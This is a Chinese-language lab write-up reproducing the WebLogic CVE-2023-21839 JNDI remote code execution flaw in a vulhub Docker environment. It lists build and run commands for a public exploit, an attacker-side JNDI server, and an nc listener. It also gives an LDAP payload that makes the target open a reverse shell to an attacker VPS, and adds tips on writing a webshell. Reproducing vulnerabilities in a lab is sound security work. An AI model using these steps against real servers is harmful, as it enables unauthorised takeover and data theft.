weblogic命令执行(CVE-2023-21839)

0x01 前言

WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

0x02 影响范围

WebLogic_Server = 12.2.1.3.0
WebLogic_Server = 12.2.1.4.0
WebLogic_Server = 14.1.1.0.0

0x03 漏洞环境

此处用vulhub中的CVE-2020-14882的环境

docker-compose up -d

0x04 漏洞复现

exp

https://github.com/4ra1n/CVE-2023-21839
cd CVE-2023-21839/cmd
go build -o CVE-2023-21839.exe

查看JNDIExploit-1.4-SNAPSHOT.jar的功能

java -jar JNDIExploit-1.4-SNAPSHOT.jar -u

image

先在攻击机上启动JNDI

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vps的IP
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.120.129

image

在vps上监听一个端口

nc -lvvp 45263

image

攻击机执行如下命令

CVE-2023-21839.exe -ip 目标IP -port 目标端口-ldap ldap://vps的IP:1389/Basic/ReverseShell/vps的IP/监听的端口
CVE-2023-21839.exe -ip 192.168.120.133 -port 7001 -ldap ldap://192.168.120.129:1389/Basic/ReverseShell/192.168.120.129/45263

image

成功反弹shell

image

0x05 漏洞总结

  1. 利用前最好先判断weblogic的版本
  2. 如果目标不出网,怎么办?可以尝试写入webshell
  3. 写shell,需要先判断网站的路径,即往哪个路径写文件